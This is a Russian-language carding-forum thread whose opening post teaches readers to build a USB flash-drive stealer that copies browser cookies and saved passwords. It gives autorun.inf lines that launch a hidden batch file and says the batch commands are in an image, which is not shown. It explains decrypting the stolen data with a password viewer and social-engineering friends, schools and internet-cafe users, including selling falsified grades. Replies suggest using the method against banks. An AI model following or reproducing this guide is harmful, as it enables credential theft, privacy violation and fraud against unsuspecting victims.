Перейти к содержимому

Сотрудничество и реклама Rockefeller, гарант сделок MasterCard, проверка товаров и услуг Jasper

Фотография

Создаем Cookiе-стилер из флешки


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 3

#1 Plastik

Plastik

    Пользователь


  • Пользователь
  • PipPip
  • 11 сообщений

Отправлено 24 Март 2018 - 22:20

Создаем Cookiе-стилер из флешки

Сегодня рассмотрим, как можно просматривать и извлекать пароли из браузеров.

847e5949644336b6905c9.jpg
Создаем Cookiе-стилер из флешки

Вся опубликованная в данной статье информация не имеет в себе призыва к действию. 

Добрый день, уважаемые читатели!

Сегодня к нам на обзор попал интересный эксплоит, который разьясняет как стиллить Cookie-файлы с браузеров, а также просматривать и извлекать пароли.

Cookie-файлы – зашифрованные текстовые документы, в которых хранится основная информация о пользователе, который юзает браузер. В эту информацию входит статистика использования браузера, персональные настройки, сохранённые логины и пароли, а также многое другое.

В интернете бытует мнение, якобы файлы куки - это такие маленькие программы, которые можно заразить вирусом и тогда те автоматически будут присылать информацию о пользователе вору. На самом же деле это просто небольшие базы данных, своего рода текстовые документы, внутри которых в зашифрованном виде хранится информация о пользователе. Таки файлы нету смысла заражать. Зато их всегда можно украсть :)

Смысл угона куки состоит в получении информации о жертве. Это удобно, когда в твоём учебном заведении все оценки хранятся в электронном журнале. Заходишь в кабинет директора, вставил флешку, и можно продавать одноклассникам хорошие оценки в табеле. Тоже своего рода небольшой нелегальный заработок.

Также в каком-нибудь интернет-кафе можно собрать море персональных данных прошлых посетителей (при условии, что они не почистили куки после себя). Правда делает это мало кто. В интернет-кафе редко ходят люди, которые хорошо разбираются в ПК. Хотя, это уже более спорное утверждение. Так-с, что-то мы отвлеклись от темы.

Что надо, для непосредственного угона Cookie?

 Начнём с предостережений. В данном способе есть как определённые минусы, так и некоторые плюсы. Начнём с минусов.

  1. Несовместимость с WINDOWS 10, и последними версиями семёрки.

Не подумайте, сам эксплоит работает на всех версиях операционки. Проблема в том, что именно на ЭТИХ версиях ОС стиллер придется юзать вручную. Майкрософт убрала возможность запускать AutoRun на 10-ке и последних версиях семёрки с соображений безопасности, что усложняет задачу. Впрочем, ничего не мешает нам наплести лапши на уши другу, что вам нужно забежать к нему и самому сбросить нужные вам файлы у него дома на свою флешку. Благо, процесс длится миллисекунды, жертва даже ничего не поймёт.

2. Есть смысл стиллить куки только тогда, когда вы уверены, что жертва сохраняет пароли в браузере.

В ином случае у вас мало что полезного получится извлечь из полученной информации.

Теперь перейдём к плюсам.

  1. Метод не палится антивирусом.

По сути вы не загружаете на компьютер троян, и не юзаете какое-нибудь вредоносное ПО. Во время стиллинга вся полученная информация копируется на флешку, где ей присваивается атрибут HIDE, и они стают скрытыми.

2. Метод ссылается на социальную инженерию.

Кто бы что ни говорил, а человека взломать легче, чем компьютер. Предлогов может быть море. Попросить друга прийти к нему с флешкой, и скачать музыку, потому что у вас якобы интернет отключили. В школе – распечатать презентацию. В интернет-кафе – вообще никаких предлогов не нужно.  

А теперь, когда мы разобрались с плюсами и минусами, пора переходить к пошаговому разбору инструкции.
  1. Создаём на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй – “stealer.bat*.bat - исполняемое расширение файла. Т.е. его можно использовать как программку*

В первый прописываем такие строчки:

[AutoRun]

Open=”stealer.bat”

Первый файл отвечает за автозапуск стиллера. 

2. Второй - непосредственно сам стиллер. Его следует наполнить такими строчками:

c4e40603670d4524bc04d.png
Команды, которые надо вписать в батник.

 

3. После этого "скрываем" получившиеся файлы, и можем идти стиллить пароли :)

4. После того, как операция выполнена успешно - возвращаемся домой, и через "Панель управления->Оформление и персонализация->Показ скрытых папок и файлов" отображаем скрытые на флешке файлы.

5. Свои куки на СВОЁМ компьютере удаляем, или скидываем на флешку. А на их место копируем полученные.

6. Теперь Скачиваем WebBrowserPassView. Лично я использовал портативную версию. В этой программе уже ничего не надо нажимать - она сама загрузит и расшифрует куки из ваших браузеров. Напоминаю, не забудьте заменить свои файлы на полученные!

5514ec64482fe15b09c7a.jpg
Интерфейс программы.

 

Возвращаясь к минусам, описанным выше следует решить какой способ стиллинга использовать. Если у жертвы стоит последняя версия винды семёрки, или вобоще десятка, тогда стиллинг лучше всего осуществлять вручную. То есть надо прийти к жертве домой, естественно заранее предумав предлог, подключить флешку к ПК, и запустить батник вручную. 

Если иная версия операционки - действуйте без опаски на расстоянии :) Всё, что надо - это отдать флешку жертве, сказав чтобы она что то на неё скинула. Сама того не зная, жертва скинет на накопитель кое-что интересное.

Используйте социальную инженерию только во благо, и тогда вам не придется оправдываться перед разъяренным вашим обманом другом :)


  • 0

#2 Heisenberg

Heisenberg

    Продвинутый пользователь


  • Полный доступ ♔
  • PipPipPip
  • 457 сообщений
  • Сделок через гарант:4

Отправлено 03 Апрель 2018 - 18:11

Немного Си и с такой флэхой можно увести всё что угодно работая тем же сисвдмином где нибудь в банке))


  • 0

#3 aumi

aumi

    Пользователь


  • Пользователь
  • PipPip
  • 19 сообщений

Отправлено 17 Май 2018 - 13:23

скрипт с синтактическими ошибками :D


  • 0

#4 Nound1944

Nound1944

    Новичок


  • Пользователь
  • Pip
  • 5 сообщений

Отправлено 24 Апрель 2019 - 17:02

Нужно ли вставлять ссылку на сервис, чтобы можно было украстьimg.jpg


  • 0




Количество пользователей, читающих эту тему: 4

1 пользователей, 3 гостей, 0 анонимных


    Seller_cc

Форум доступен во всех городах: Москва, Санкт-Петербург, Киев, Минск, Новосибирск, Екатеринбург, Нижний Новгород, Самара, Омск, Казань, Челябинск, Ростов-на-Дону, Уфа, Волгоград, Пермь, Красноярск, Воронеж, Саратов, Краснодар, Тольятти Ижевск, Ульяновск и др.

Схемы заработка в интернете, кардинг форум, залив на карту.